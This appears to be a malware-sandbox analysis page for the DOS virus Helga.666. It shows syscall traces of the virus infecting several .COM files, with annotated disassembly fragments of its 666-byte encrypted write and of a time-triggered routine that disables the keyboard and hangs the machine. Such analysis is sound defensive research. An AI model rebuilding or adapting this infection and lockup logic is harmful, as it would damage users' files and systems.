Sample viewer

vx.netlux.org/Virus.DOS.Helga.666.c


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:06:14.653043722Z 26 PC: 12aa4 | Set disk transfer address
2018-12-17T23:06:14.654474792Z 78 PC: 12ab7 | Find first file
2018-12-17T23:06:14.661853265Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:14.663372992Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:14.670144093Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:14.68932777Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:06:14.697627966Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:14.699846187Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:14.717693351Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-17T23:06:14.719794792Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-17T23:06:14.72314415Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:14.733402757Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:14.736167185Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:14.743953174Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:14.746255372Z 62 PC: 12b66 | Close file
2018-12-17T23:06:14.755844541Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:14.766829174Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:14.769793457Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:14.772043016Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:14.779030123Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:14.789503003Z 61 PC: 12c51 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:06:14.7981705Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:14.800873181Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:14.808602944Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-17T23:06:14.81140379Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-17T23:06:14.814525168Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:14.824358767Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:14.827182025Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:14.834751617Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:14.836798786Z 62 PC: 12b66 | Close file
2018-12-17T23:06:14.846292666Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:14.858257681Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:14.861652564Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:14.877007584Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:14.884272883Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:14.897373324Z 61 PC: 12c51 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:06:14.905095383Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:14.90851432Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:14.9160668Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-17T23:06:14.918113428Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-17T23:06:14.922288407Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:14.931521277Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:14.933468188Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:14.942369904Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:14.944143228Z 62 PC: 12b66 | Close file
2018-12-17T23:06:14.952773794Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:14.964232117Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:14.967236586Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:14.968593698Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:14.975178969Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:14.986798706Z 61 PC: 12c51 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:06:14.994004002Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:14.995709259Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.003910137Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-17T23:06:15.005815329Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-17T23:06:15.008987854Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:15.019578005Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:15.021631295Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:15.029239409Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.032376638Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.04223866Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.053630247Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.05720057Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:15.058839852Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:15.0650827Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:15.076956394Z 61 PC: 12c51 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:06:15.08462963Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:15.086704492Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.094006991Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-17T23:06:15.097006751Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-17T23:06:15.099989008Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:15.109254248Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:15.111842955Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:15.119683807Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.121476577Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.131457493Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.142322621Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.144963746Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:15.146490166Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:15.153143946Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:15.163558687Z 61 PC: 12c51 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:06:15.175998446Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:15.179172132Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.187017393Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-17T23:06:15.189022543Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-17T23:06:15.193288112Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:15.203128073Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:15.204957372Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:15.213256255Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.21508313Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.223729746Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.235038077Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.238593502Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:15.239818876Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:15.245999576Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:15.257174136Z 61 PC: 12c51 | Open file (Filename = 'PAH.COM')
2018-12-17T23:06:15.264282291Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:15.26607446Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.273680751Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-17T23:06:15.275199496Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-17T23:06:15.277728752Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:06:15.286975657Z 66 PC: 12b37 | Move file pointer
2018-12-17T23:06:15.288438868Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:06:15.295323492Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.29725885Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.305552995Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.316733876Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.320726593Z 47 PC: 12abd | Get disk transfer address
2018-12-17T23:06:15.322712016Z 67 PC: 12c43 | Get or set file attributes
2018-12-17T23:06:15.329106428Z 67 PC: 12c4b | Get or set file attributes
2018-12-17T23:06:15.33878736Z 61 PC: 12c51 | Open file (Filename = 'TEST.COM')
2018-12-17T23:06:15.346488358Z 87 PC: 12c58 | Get or set file date and time
2018-12-17T23:06:15.348337274Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:06:15.354556698Z 87 PC: 12b60 | Get or set file date and time
2018-12-17T23:06:15.356160673Z 62 PC: 12b66 | Close file
2018-12-17T23:06:15.361933297Z 67 PC: 12b6d | Get or set file attributes
2018-12-17T23:06:15.374783397Z 79 PC: 12ab7 | Find next file
2018-12-17T23:06:15.378193809Z 78 PC: 12c06 | Find first file
2018-12-17T23:06:15.387620763Z 78 PC: 12c06 | Find first file
2018-12-17T23:06:15.392184744Z 78 PC: 12b97 | Find first file
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44): a time-based trigger check.
; Get time returns CH = hour and CL = minute, so the first instruction (cmp ch, cl) tests whether hour equals minute.
; In this run the next trace row is at PC 12ad6, so the ret path was taken and the branch target did not execute.
2018-12-17T23:06:15.397328013Z 44 PC: 12cc5 | Get time 0x12cc5: cmp ch, cl
0x12cc7: je 0x12cca  ; equal: continue into the routine below
0x12cc9: ret  ; not equal: return to the caller
0x12cca: cli
0x12ccb: mov al, 0xad
0x12ccd: out 0x64, al  ; port 0x64 is the keyboard-controller command port; 0xAD is its "disable keyboard" command
0x12ccf: nop
0x12cd0: sti
0x12cd1: mov dx, di
0x12cd3: add dx, 0x218  ; DS:DX = string at DI+0x218
0x12cd7: mov ah, 9
0x12cd9: int 0x21  ; DOS function 09h: print a '$'-terminated string
0x12cdb: cli
0x12cdc: jmp 0x12cdc  ; jump-to-self with interrupts disabled: the machine hangs; no disk access occurs on this path before the hang
; Not reachable by fall-through. "add word ptr [bx], di" encodes as 01 3F and "aas" as 3F (ASCII '?'),
; so these are probably data bytes decoded as instructions (TODO confirm against the raw bytes).
0x12cde: add word ptr [bx], di
0x12ce0: aas
0x12ce1: aas
0x12ce2: aas
0x12ce3: aas
0x12ce4: aas
2018-12-17T23:06:15.399208178Z 26 PC: 12ad6 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15470,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.453721632Z 26 PC: 12aa4 | Set disk transfer address
2018-12-25T12:43:30.462566126Z 78 PC: 12ab7 | Find first file
2018-12-25T12:43:30.468801405Z 47 PC: 12abd | Get disk transfer address
2018-12-25T12:43:30.469919811Z 67 PC: 12c43 | Get or set file attributes
2018-12-25T12:43:30.490400707Z 67 PC: 12c4b | Get or set file attributes
2018-12-25T12:43:30.50566423Z 61 PC: 12c51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:30.513138392Z 87 PC: 12c58 | Get or set file date and time
2018-12-25T12:43:30.515630006Z 63 PC: 12af6 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:43:30.522663378Z 66 PC: 12b19 | Move file pointer
; Linear disassembly from the return address of INT 21h AH=2Ch (Get time, logged as op 44).
; Trace context: this code runs between the 4-byte read and the 666-byte write on each opened .COM file.
; The first instruction (xor cx, dx) mixes the returned time registers: CX = hour:minute, DX = second:hundredths.
2018-12-25T12:43:30.524367326Z 44 PC: 12a6e | Get time 0x12a6e: xor cx, dx
0x12a70: xor ch, cl  ; fold the mixed time value into one byte in CH
0x12a72: mov byte ptr [di + 0x10], ch  ; store that byte at [DI+0x10]; presumably a key for the routine called next (TODO confirm)
0x12a75: call 0x22a4e  ; NOTE(review): a 16-bit near call wraps inside the segment, so the real target is likely 0x12a4e; its body is not in this listing
0x12a78: pop bx  ; BX is overwritten by the popaw that follows
0x12a79: popaw  ; presumably pairs with a pushaw before this window
0x12a7a: mov ah, byte ptr [di + 9]  ; DOS function number read from memory, not an immediate; the next trace row logs it as op 64 (40h, Write)
0x12a7d: mov cx, 0x29a  ; 0x29A = 666 bytes, the length logged for the write that follows
0x12a80: nop
0x12a81: mov dx, di  ; DS:DX = buffer starting at DI
0x12a83: int 0x21
0x12a85: pushaw
0x12a86: call 0x22a4e  ; same routine again after the write; consistent with undoing a symmetric transform in memory (TODO confirm)
0x12a89: pop bx
0x12a8a: popaw
0x12a8b: ret
; The instructions after the ret are outside this routine; the window shows only their first bytes.
0x12a8c: xchg si, di
0x12a8e: pop si
0x12a8f: sub si, 6  ; NOTE(review): pop / sub 6 / push looks like deriving a base address from a return address; verify against the full disassembly
0x12a92: push si
2018-12-25T12:43:30.527334968Z 64 PC: 12a85 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:43:30.540149088Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:43:30.541824017Z 64 PC: 12b57 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:43:30.548564676Z 87 PC: 12b60 | Get or set file date and time
2018-12-25T12:43:30.551054104Z 62 PC: 12b66 | Close file
2018-12-25T12:43:30.558904498Z 67 PC: 12b6d | Get or set file attributes
2018-12-25T12:43:30.568804076Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.572348632Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.573476799Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.579636925Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.590405076Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.59712633Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.598692462Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.60676891Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.608331102Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.610945446Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.619996625Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.635221427Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.642364654Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.646575357Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.654470336Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.664690349Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.668397195Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.670257756Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.676075422Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.687370538Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.693906119Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.695344051Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.710094914Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.722826257Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.725500284Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.733728709Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.735806655Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.742224061Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.7437164Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.754226458Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.764297671Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.769378939Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.772590495Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.781359145Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.794305508Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.802121495Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.803676933Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.8099819Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.8118827Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.81472819Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.823058718Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.824947469Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.832477399Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.834218784Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.842822304Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.853246196Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.855917737Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.857388911Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.863622259Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.881755676Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.888770951Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.891919836Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.899057987Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.900711534Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.904622155Z 64 PC: 12a85 | Write file or device (See above)
2018-12-25T12:43:30.913386054Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:43:30.915107833Z 64 PC: 12b57 | Write file or device (See above)
2018-12-25T12:43:30.925032076Z 87 PC: 12b60 | Get or set file date and time (See above)
2018-12-25T12:43:30.926727002Z 62 PC: 12b66 | Close file (See above)
2018-12-25T12:43:30.934536635Z 67 PC: 12b6d | Get or set file attributes (See above)
2018-12-25T12:43:30.945526268Z 79 PC: 12ab7 | Find next file (See above)
2018-12-25T12:43:30.948368206Z 47 PC: 12abd | Get disk transfer address (See above)
2018-12-25T12:43:30.949812165Z 67 PC: 12c43 | Get or set file attributes (See above)
2018-12-25T12:43:30.956683516Z 67 PC: 12c4b | Get or set file attributes (See above)
2018-12-25T12:43:30.966352216Z 61 PC: 12c51 | Open file (See above)
2018-12-25T12:43:30.973312059Z 87 PC: 12c58 | Get or set file date and time (See above)
2018-12-25T12:43:30.97531824Z 63 PC: 12af6 | Read file or device (See above)
2018-12-25T12:43:30.981830184Z 66 PC: 12b19 | Move file pointer (See above)
2018-12-25T12:43:30.983520079Z 44 PC: 12a6e | Get time (See above)
2018-12-25T12:43:30.987300603Z 64 PC: 12a85 | Write file or device (See above)
